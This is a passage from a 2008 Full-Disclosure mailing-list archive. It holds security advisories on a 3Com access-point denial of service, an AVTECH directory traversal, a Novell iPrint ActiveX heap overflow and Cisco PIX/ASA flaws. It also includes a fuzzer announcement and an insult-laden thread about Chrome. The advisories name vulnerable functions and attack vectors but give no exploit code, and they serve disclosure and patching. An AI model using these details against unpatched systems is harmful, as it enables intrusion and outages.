Vulnerability In-Reply-To: <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> References: <20080903.003706.20417.1@webmail08.vgs.untd.com> <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> Message-ID: <4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com> On Wed, Sep 3, 2008 at 8:52 AM, silky wrote: > On Wed, Sep 3, 2008 at 5:37 PM, Paul Ferguson wrote: >> Okay, well you cannot deny this is a lackluster starting point. >> >> I hope Google can use this inauspicious starting point to build >> the advertising empire they desire. >> >> I for one do not welcome the advertisement overlords. > > you're not the only one; don't worry. > > >> - - ferg >> I think the world's biggest hacker HD Moore will be releasing exploits for the browser soon, you know what he's like, so you shouldn't need to worry. All the best, n3td3v From beckett.samuel at gmail.com Wed Sep 3 10:31:25 2008 From: beckett.samuel at gmail.com (Samuel Beckett) Date: Wed, 3 Sep 2008 16:31:25 +0700 Subject: [Full-disclosure] Hardcoded Keys Message-ID: <4d413ee20809030231y43db8a44s4045876b1e91d57e@mail.gmail.com> What would be the the worst case if you implement the following scenario for a credit card transaction: - Store the private keys as disk files and place them in an area on a server that is readable from a DLL that contains the decryption algorithm -Hardcode one password into a DLL and the other password will be supplied by the service that requests the decryption. This password is then SHA1 hashed with a passphrase -- the result is used to decrypt the private key. After the successful credit card transaction, certain credit card details are then encrypted and stored within the database. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080903/83b96aec/attachment.html From DDI.VulnerabilityAlert at ddifrontline.com Tue Sep 2 20:52:59 2008 From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert) Date: Tue, 2 Sep 2008 14:52:59 -0500 Subject: [Full-disclosure] DDIVRT-2008-14 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point Malformed HTTP POST DoS Message-ID: <2571D31D42513640AE1632FEE100E0E40246F1F6@hypercom.defense.local> Title --------- DDIVRT-2008-14 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point Malformed HTTP POST DoS Severity -------- Medium Date Discovered --------------- May 20, 2008 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: Brandon Shilling and r at b13$ Vulnerability Description ------------------------- The 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point is an enterprise-grade wireless access point. The web management interface is vulnerable to a DoS condition due to improper validation of malformed HTTP POST requests. Successful exploitation will result in a complete DoS of the device. Solution Description -------------------- 3Com has not addressed this issue at this time. Digital Defense, Inc. does not currently know of any work arounds for this flaw. Tested Systems / Software (with versions) ------------------------------------------ Tested against 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point, firmware unknown. Vendor Contact -------------- Name: 3Com Website: http://www.3com.com From DDI.VulnerabilityAlert at ddifrontline.com Tue Sep 2 21:21:49 2008 From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert) Date: Tue, 2 Sep 2008 15:21:49 -0500 Subject: [Full-disclosure] DDIVRT-2008-13 AVTECH PageR Enterprise Directory Traversal Message-ID: <2571D31D42513640AE1632FEE100E0E40246F1F7@hypercom.defense.local> Title ------ DDIVRT-2008-13 AVTECH PageR Enterprise Directory Traversal Severity -------- Medium Date Discovered --------------- July 1, 2008 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: Corey LeBleu and r at b13$ Vulnerability Description ------------------------- PageR Enterprise is a centralized device / server event monitoring system. The PageR Enterprise server web interface is vulnerable to a common web directory traversal attack. Successful eploitation will result in arbitrary read-only file access outside of the PageR Enterprise web root. Solution Description -------------------- AVTECH has addressed this flaw in PageR version 5.0.7, which was available for public use on August 13, 2008. Tested Systems / Software (with versions) ------------------------------------------ Tested against PageR Enterprise/4.3.7 running on a Microsoft Windows 2000 system. Other versions of PageR Enterprise may be vulnerable. Vendor Contact -------------- Name: AVTECH Website: http://avtech.com/ Contact Information: Info at AVTECH.com From remove-vuln at secunia.com Wed Sep 3 09:42:25 2008 From: remove-vuln at secunia.com (Secunia Research) Date: Wed, 3 Sep 2008 10:42:25 +0200 Subject: [Full-disclosure] Secunia Research: Novell iPrint Client nipplib.dll "IppCreateServerRef()" Buffer Overflow Message-ID: <200809030842.m838gP6f022700@ca.secunia.com> ====================================================================== Secunia Research 03/09/2008 - Novell iPrint Client - - nipplib.dll "IppCreateServerRef()" Buffer Overflow - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * Novell iPrint Client 4.36 * Novell iPrint Client for Vista 5.04 * Novell iPrint Client for Vista 5.06 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Vendor's Description of Software "Neither you nor your users have time to devote to a complex printing environment. That's why Novell iPrint extends print services securely across multiple networks and operating systems. Using proven Internet technologies, iPrint transforms your Novell Distributed Print Services? (NDPS?) printers into Net-enabled printers, making all your printing resources instantly accessible with a Web browser and a few mouse clicks". Product Link: http://www.novell.com/products/openenterpriseserver/iprint.html ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Novell iPrint Client, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the "IppCreateServerRef()" function in nipplib.dll. This can be exploited to cause a heap-based buffer overflow by passing an overly long, specially crafted string as argument to either "GetPrinterURLList()", "GetPrinterURLList2()", or "GetFileList2()" as provided by the Novell iPrint ActiveX control (ienipp.ocx). Successful exploitation may allow execution of arbitrary code. ====================================================================== 5) Solution Update to version 4.38 or 5.08. ====================================================================== 6) Time Table 25/08/2008 - Vendor notified. 26/08/2008 - Vendor response. 03/09/2008 - Public disclosure. ====================================================================== 7) Credits Discovered by Carsten Eiram, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2008-2436 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2008-33/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From urlancomp at gmail.com Wed Sep 3 13:36:33 2008 From: urlancomp at gmail.com (Urlan) Date: Wed, 3 Sep 2008 09:36:33 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <200809030018.07155.tmdhat@gmail.com> References: <985632087.20080903052045@gmail.com> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> <200809030018.07155.tmdhat@gmail.com> Message-ID: <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com> PT: FODA-SE! 1) Perdao, mas eu nao vi em nenhum lugar voce ajudando em coisa alguma. 2) Eu falo e escrevo em portugues, estou no Brasil. Obrigado mas eu nao quero postar coisas em ingles para quem quer que seja ler. Urlan On Wed, Sep 3, 2008 at 12:18 AM, The Mad Hatter wrote: > On Tuesday 02 September 2008 23:28:33 Urlan wrote: > > Por que todo esse alvoro?o por causa de um bug na vers?o beta?! > > > > pt: n?o seja t?o imbecil > en: don't be such a moron > > you are lame twice; first for posting in portuguese, then for giving a > stupid > negative contribution to the thread. if you don't have shit to say at least > don't say shit. > > -- > tmh > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080903/54f90c59/attachment.html From akl at experian.dk Wed Sep 3 13:41:36 2008 From: akl at experian.dk (Anders Klixbull) Date: Wed, 3 Sep 2008 14:41:36 +0200 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com> References: <985632087.20080903052045@gmail.com><4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com><8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com><200809030018.07155.tmdhat@gmail.com> <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com> Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD32438@PRO-EXCHANGESRV.experian.dk> shut the fuck up ________________________________ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Urlan Sent: 3. september 2008 14:37 To: The Mad Hatter Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Google Chrome Browser Vulnerability PT: FODA-SE! 1) Perdao, mas eu nao vi em nenhum lugar voce ajudando em coisa alguma. 2) Eu falo e escrevo em portugues, estou no Brasil. Obrigado mas eu nao quero postar coisas em ingles para quem quer que seja ler. Urlan On Wed, Sep 3, 2008 at 12:18 AM, The Mad Hatter wrote: On Tuesday 02 September 2008 23:28:33 Urlan wrote: > Por que todo esse alvoro?o por causa de um bug na vers?o beta?! > pt: n?o seja t?o imbecil en: don't be such a moron you are lame twice; first for posting in portuguese, then for giving a stupid negative contribution to the thread. if you don't have shit to say at least don't say shit. -- tmh _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080903/42cdf480/attachment.html From urlancomp at gmail.com Wed Sep 3 13:59:33 2008 From: urlancomp at gmail.com (Urlan) Date: Wed, 3 Sep 2008 09:59:33 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <4bb6f2de0809030554h276ba84cj7e45c55ffe44924@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> <200809030018.07155.tmdhat@gmail.com> <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com> <4bb6f2de0809030554h276ba84cj7e45c55ffe44924@mail.gmail.com> Message-ID: <8b88d71c0809030559h6ded64d4v9e10fa559adf88c0@mail.gmail.com> Sorry for my mistake. Urlan 2008/9/3 Fabio N Sarmento [ Gmail ] > So what fuck are you doing here? > This list speak english, if you dont want to, get out. > > 2008/9/3 Urlan > >> PT: FODA-SE! >> >> 1) Perdao, mas eu nao vi em nenhum lugar voce ajudando em coisa alguma. >> 2) Eu falo e escrevo em portugues, estou no Brasil. Obrigado mas eu nao >> quero postar coisas em ingles para quem quer que seja ler. >> >> Urlan >> >> >> On Wed, Sep 3, 2008 at 12:18 AM, The Mad Hatter wrote: >> >>> On Tuesday 02 September 2008 23:28:33 Urlan wrote: >>> > Por que todo esse alvoro?o por causa de um bug na vers?o beta?! >>> > >>> >>> pt: n?o seja t?o imbecil >>> en: don't be such a moron >>> >>> you are lame twice; first for posting in portuguese, then for giving a >>> stupid >>> negative contribution to the thread. if you don't have shit to say at >>> least >>> don't say shit. >>> >>> -- >>> tmh >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > > -- > Em caso de d?vidas estou a disposi??o > > + Coordialmente, > + F?bio N Sarmento > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080903/c49fb246/attachment.html From fabior2 at gmail.com Wed Sep 3 13:54:08 2008 From: fabior2 at gmail.com (Fabio N Sarmento [ Gmail ]) Date: Wed, 3 Sep 2008 09:54:08 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <4b6ee9310809021921k50be7c8cj289a52584c8ae476@mail.gmail.com> <8b88d71c0809021928r328c5753qef27ce23d3cf7d16@mail.gmail.com> <200809030018.07155.tmdhat@gmail.com> <8b88d71c0809030536q69fb53d1t34595c755a045a0c@mail.gmail.com> Message-ID: <4bb6f2de0809030554h276ba84cj7e45c55ffe44924@mail.gmail.com> So what fuck are you doing here? This list speak english, if you dont want to, get out. 2008/9/3 Urlan > PT: FODA-SE! > > 1) Perdao, mas eu nao vi em nenhum lugar voce ajudando em coisa alguma. > 2) Eu falo e escrevo em portugues, estou no Brasil. Obrigado mas eu nao > quero postar coisas em ingles para quem quer que seja ler. > > Urlan > > > On Wed, Sep 3, 2008 at 12:18 AM, The Mad Hatter wrote: > >> On Tuesday 02 September 2008 23:28:33 Urlan wrote: >> > Por que todo esse alvoro?o por causa de um bug na vers?o beta?! >> > >> >> pt: n?o seja t?o imbecil >> en: don't be such a moron >> >> you are lame twice; first for posting in portuguese, then for giving a >> stupid >> negative contribution to the thread. if you don't have shit to say at >> least >> don't say shit. >> >> -- >> tmh >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Em caso de d?vidas estou a disposi??o + Coordialmente, + F?bio N Sarmento -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080903/2725286b/attachment.html From Valdis.Kletnieks at vt.edu Wed Sep 3 17:06:01 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 03 Sep 2008 12:06:01 -0400 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: Your message of "Wed, 03 Sep 2008 10:04:43 BST." <4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com> References: <20080903.003706.20417.1@webmail08.vgs.untd.com> <5e01c29a0809030052x47f06d72hb6788f8d9fdb42a9@mail.gmail.com> <4b6ee9310809030204y2f01e1bdo301dace11ac08e1f@mail.gmail.com> Message-ID: <18911.1220457961@turing-police.cc.vt.edu> On Wed, 03 Sep 2008 10:04:43 BST, n3td3v said: > I think the world's biggest hacker HD Moore HD is incredibly talented, and deserves a round of applause for Metasploit. However, a minute's thought will show that we don't have a fucking *clue* who the world's biggest hacker is. We have plenty of candidates for "biggest hacker who screwed up and got caught" and "biggest hacker who blabbed to his friends". But just as any ninja you actually see isn't a very good ninja, we won't know who the biggest hacker is. I'd place bets that whoever it is, they're on the RBN payroll... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080903/4a3edb83/attachment.bin From victor.stinner at haypocalc.com Wed Sep 3 17:38:43 2008 From: victor.stinner at haypocalc.com (Victor Stinner) Date: Wed, 3 Sep 2008 18:38:43 +0200 Subject: [Full-disclosure] Fusil the fuzzer version 1.0beta3 Message-ID: <200809031838.43988.victor.stinner@haypocalc.com> Fusil is a Python library for writing fuzzers and a set of specific fuzzers: Apache, ClamAV, Firefox, gettext, gstreamer, ImageMagick, libpoppler, printf(), Mplayer, ogg123, PHP and Python. The goal is to quickly write your fuzzer, Fusil is reponsible to manage a fuzzing campain (create files, cleanup at exist, sort errors, etc.). With the version 1.0, Fusil is safe: it uses a dedicated (UNIX) user to create child processes and limit resources (memory, total number of processes, etc.). Fusil now uses python-ptrace debugger for helping error classification (invalid memory read/write, division by zero, stack overflow, ...): it renames the fuzzer working directory (eg. "exitcode1", "abort", "div_by_zero", ...). This version is a beta version, it have to be tested as much as possible on any architectures and operating systems. Don't hesitate to report bugs! Website: http://fusil.hachoir.org/ python-ptrace website: http://python-ptrace.hachoir.org/ The development of the version 1.0 (still in beta phase) took around one year. The project is distributed under license GPLv2, is written in Python and is pacakaged for Debian, Mandriva and OpenEmbedded. The project is developed under Linux, but Fusil works correctly on FreeBSD and should works on any POSIX system (especially UNIX and BSD). Getting started --------------- To install Fusil, you will need python-ptrace and a system user "fusil" (and a group "fusil"). To run a fuzzer, type it's name, eg. "fusil-gettext". Each fuzzer has its own options, so don't hesitate to use the option "--help". For the documentation, browse the directory doc/. Simple examples are available in the directory examples/. python-ptrace only works correclty on Linux (i386, x86_64, PPC32) and FreeBSD (i386). If you have troubles with another architecture/OS, disable it with the Fusil configuration file (~/.config/fusil.conf): [debugger] use_debugger = False Read doc/configuration.rst to learn other Fusil options. python-ptrace ------------- If you didn't know python-ptrace, you should know that it's only written in Python and includes the programs strace.py and gdb.py (strace and gdb clones). strace.py is very close to strace, but has more options and works on FreeBSD without the Linux emulation (/proc directory). gdb.py is very limited, it doesn't support thread nor symbols for example. From psirt at cisco.com Wed Sep 3 18:15:00 2008 From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team) Date: Wednesday, 03 September 2008 12:15:00 -0500 Subject: [Full-disclosure] Cisco Security Advisory: Remote Access VPN and SIP Vulnerabilities in Cisco PIX and Cisco ASA Message-ID: <20080903121500.pixasa@psirt.cisco.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Remote Access VPN and SIP Vulnerabilities in Cisco PIX and Cisco ASA Advisory ID: cisco-sa-20080903-asa Revision 1.0 For Public Release 2008 September 3 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive Security Appliances and Cisco PIX Security Appliances that may result in a reload of the device or disclosure of confidential information. This security advisory outlines details of the following vulnerabilities: * Erroneous SIP Processing Vulnerabilities * IPSec Client Authentication Processing Vulnerability * SSL VPN Memory Leak Vulnerability * URI Processing Error Vulnerability in SSL VPNs * Potential Information Disclosure in Clientless VPNs Note: These vulnerabilities are independent of each other. A device may be affected by one vulnerability and not affected by another. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate some of these vulnerabilities are available. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20080903-asa.shtml Affected Products ================= The following paragraphs describe the affected Cisco ASA and Cisco PIX software versions: Vulnerable Products +------------------ The following sections provide details on the versions of Cisco ASA that are affected by each vulnerability. The show version command-line interface (CLI) command can be used to determine if a vulnerable version of the Cisco PIX or Cisco ASA software is running. The following example shows a Cisco ASA device that runs software release 8.0(2): ASA# show version Cisco Adaptive Security Appliance Software Version 8.0(2) Device Manager Version 6.0(1) [...] Customers who use the Cisco Adaptive Security Device Manager (ASDM) to manage their devices can find their software version displayed in a table in the login window or in the upper left corner of the ASDM window. Erroneous SIP Processing Vulnerabilities Cisco PIX and Cisco ASA devices configured for SIP inspection are vulnerable to multiple processing errors that may result in denial of service attacks. Cisco PIX and ASA software versions prior to 7.0(7) 16, 7.1(2)71, 7.2(4)7, 8.0(3)20, and 8.1(1)8 are vulnerable to these SIP processing errors. IPSec Client Authentication Processing Vulnerability Cisco PIX and Cisco ASA devices that terminate remote access VPN connections are vulnerable to a denial of service attack if the device is running software versions prior to 7.2(4)2, 8.0(3)14, and 8.1(1)4. Cisco PIX and Cisco ASA devices that run software versions 7.0 and 7.1 are not affected by this vulnerability. SSL VPN Memory Leak Vulnerability Cisco ASA devices that terminate clientless remote access VPN connections are vulnerable to a denial of service attack affecting the SSL processing software if the device is running a software version prior to 7.2(4)2, 8.0(3)14, or 8.1(1)4. Cisco ASA devices that run software versions 7.0 and 7.1 are not affected by this vulnerability. URI Processing Error Vulnerability in SSL VPNs Cisco ASA devices that terminate clientless remote access VPN connections are vulnerable to a denial of service attack in the HTTP server if the device is running software versions prior to 8.0(3)15, and 8.1(1)5. Cisco ASA devices that run software versions 7.0, 7.1, or 7.2 are not affected by this vulnerability. Potential Information Disclosure in Clientless VPNs Cisco ASA devices that terminate clientless remote access VPN connections are vulnerable to potential information disclosure if the device is running affected 8.0 or 8.1 software versions. Cisco ASA devices running software versions 7.0, 7.1, or 7.2 are not affected by this vulnerability. Cisco ASA devices the run software versions prior to 8.0(3)15 and 8.1(1)4, or after 8.0(3)16 and 8.1(1)5 are also not affected by this vulnerability. Products Confirmed Not Vulnerable +-------------------------------- The Cisco Firewall Services Module (FWSM) is not affected by any of these vulnerabilities. Cisco PIX security appliances running software versions 6.x are not vulnerable. IOS, IOS XR, and Cisco Unified Boarder Elements (CUBE) are not vulnerable to these issues. No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The following sections provide details to help determine if a device may be affected by any of the vulnerabilities. Erroneous SIP Processing Vulnerabilities Cisco PIX and Cisco ASA devices configured for SIP inspection are vulnerable to multiple processing errors that may result in denial of service attacks. All Cisco PIX and Cisco ASA software releases may be vulnerable to these SIP processing vulnerabilities. A successful attack may result in a reload of the device. SIP inspection is enabled with the inspect sip command. To determine whether the Cisco PIX or Cisco ASA security appliance is configured to support inspection of sip packets, log in to the device and issue the CLI command show service-policy | include sip. If the output contains the text Inspect: sip and some statistics, then the device has a vulnerable configuration. The following example shows a vulnerable Cisco ASA Security Appliance: asa#show service-policy | include sip Inspect: sip, packet 0, drop 0, reset-drop 0 asa# These vulnerability is documented in the following Cisco Bug IDs and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2732. * CSCsq07867 * CSCsq57091 * CSCsk60581 * CSCsq39315 IPSec Client Authentication Processing Vulnerability Cisco PIX and Cisco ASA devices configured to terminate client based VPN connections are vulnerable to a crafted authentication processing vulnerability if they are running software versions 7.2, 8.0, or 8.1. Devices that run software versions 7.0 or 7.1 are not affected by this vulnerability. A successful attack may result in a reload of the device. Remote access VPN connections will have Internet Security Association and Key Management Protocol (ISAKMP) enabled on an interface with the crypto command, such as: crypto isakmp enable outside. This vulnerability is documented in Cisco Bug ID CSCso69942 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2733. SSL VPN Memory Leak Vulnerability and URI Processing Error Vulnerability in SSL VPNs A crafted SSL or HTTP packet may cause a denial of service condition on a Cisco ASA device that is configured to terminate clientless VPN connections. A successful attack may result in a reload of the device. Cisco ASA devices that run versions 7.2, 8.0, or 8.1 with clientless SSL VPNs enabled may be affected by this vulnerability. Devices that run software versions 7.0 and 7.1 are not affected by this vulnerability. Clientless VPN, SSL VPN Client, and AnyConnect connections are enabled via the webvpn command. For example, the following configuration shows a Cisco ASA with Clientless VPNs configured and enabled. In this case the ASA will listen for VPN connections on the default port, TCP port 443: http server enable ! webvpn enable outside Note that with this particular configuration, the device is vulnerable to attacks coming from the outside interface due to the enable outside command within the webvpn group configuration. These vulnerabilities are documented in Cisco Bug ID CSCso66472 and CSCsq19369. They have been assigned Common Vulnerabilities and Exposures (CVE) identifiers CVE-2008-2734 and CVE-2008-2735. Potential Information Disclosure in Clientless VPNs On Cisco ASA devices configured to terminate clientless VPN connections, an attacker may be able to discover potentially sensitive information such as usernames and passwords. This attack requires an attacker to convince a user to visit a rogue web server, reply to an e-mail, or interact with a service to successfully exploit the vulnerability. Cisco ASA devices running software versions 8.0 or 8.1 with clientless VPNs enabled may be affected by this vulnerability. Cisco ASA devices running that run software versions 7.0, 7.1, or 7.2 are not vulnerable to this vulnerability. Clientless SSL VPN connections are enabled via the webvpn command. For example, the following configuration shows a Cisco ASA device with Clientless VPNs configured and enabled. In this case the Cisco ASA device will listen for VPN connections on the default port, TCP port 443: http server enable ! webvpn enable outside Note that with this particular configuration, the device is vulnerable to attacks coming from the outside interface due to the enable outside command within the webvpn group configuration. This vulnerability is documented in Cisco Bug ID CSCsq45636 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2736. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is calculated in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss Erroneous SIP Processing Vulnerabilities CSCsq07867 - Memory corruption with traceback in SIP inspection code CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official Fix Report Confidence - Confirmed CSCsq57091 - Memory corruption and traceback when inspecting malformed SIP packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official Fix Report Confidence - Confirmed CSCsk60581 - Device reload possible when SIP inspection is enabled CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official Fix Report Confidence - Confirmed CSCsq39315 - Traceback when processing malformed SIP requests CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official Fix Report Confidence - Confirmed IPSec Client Authentication Processing Vulnerability CSCso69942 - Traceback in Remote Access Authentication Code CVSS Base Score - 6.8 Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 5.6 Exploitability - Functional Remediation Level - Official Fix Report Confidence - Confirmed SSL VPN Memory Leak Vulnerability CSCso66472 - Crypto memory leak causing Clientless SSL VPNs to hang CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official Fix Report Confidence - Confirmed URI Processing Error Vulnerability in SSL VPNs CSCsq19369 - URI Processing Error in Clientless SSL VPN connections CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official Fix Report Confidence - Confirmed Potential Information Disclosure in Clientless VPNs CSCsq45636 - Potential Information Disclosure in Clientless SSL VPNs CVSS Base Score - 7.1 Access Vector - Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - None Availability Impact - None CVSS Temporal Score - 5.9 Exploitability - Functional Remediation Level - Official Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the Erroneous SIP Processing Vulnerabilities, IPSec Client Authentication Processing Vulnerability, SSL VPN Memory Leak Vulnerability, or URI Processing Error Vulnerability in SSL VPNs may result in the device reloading. This can be repeatedly exploited and may lead to a denial of service attack. The Potential Information Disclosure in Clientless SSL VPNs vulnerability may allow an attacker to obtain user and group credentials if the user interacts with a rogue system or document. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. The following list contains the first fixed software release of each vulnerability: +-----------------------------------------------------+ | | | Affected | First | | Vulnerability | Bug ID | Release | Fixed | | | | | Release | |----------------+------------+----------+------------| | | | 7.0 | 7.0(7)15 | | | |----------+------------| | | | 7.1 | 7.1(2)70 | |Memory | |----------+------------| | corruption | | 7.2 | Not | | with traceback | CSCsq07867 | | vulnerable | |in SIP | |----------+------------| | inspection | | 8.0 | Not | | code | | | vulnerable | | | |----------+------------| | | | 8.1 | Not | | | | | vulnerable | |----------------+------------+----------+------------| | | | 7.0 | Not | | | | | vulnerable | |Memory | |----------+------------| | corruption and | | 7.1 | Not | | traceback when | | | vulnerable | |inspecting |CSCsq57091 |----------+------------| | malformed SIP | | 7.2 | 7.2(4)7 | |packets | |----------+------------| | | | 8.0 | 8.0(3)20 | | | |----------+------------| | | | 8.1 | 8.1(1)8 | |----------------+------------+----------+------------| | | | 7.0 | Not | | | | | vulnerable | | | |----------+------------| | | | 7.1 | Not | | Device reload | | | vulnerable | |possible when |CSCsk60581 |----------+------------| | SIP inspection | | 7.2 | 7.2(3)18 | |is enabled | |----------+------------| | | | 8.0 | 8.0(3)8 | | | |----------+------------| | | | 8.1 | Not | | | | | vulnerable | |----------------+------------+----------+------------| | | | 7.0 | 7.0(7)16 | | | |----------+------------| | | | 7.1 | 7.1(2)71 | | | |----------+------------| | Traceback when | | 7.2 | Not | | processing | CSCsq39315 | | vulnerable | |malformed SIP | 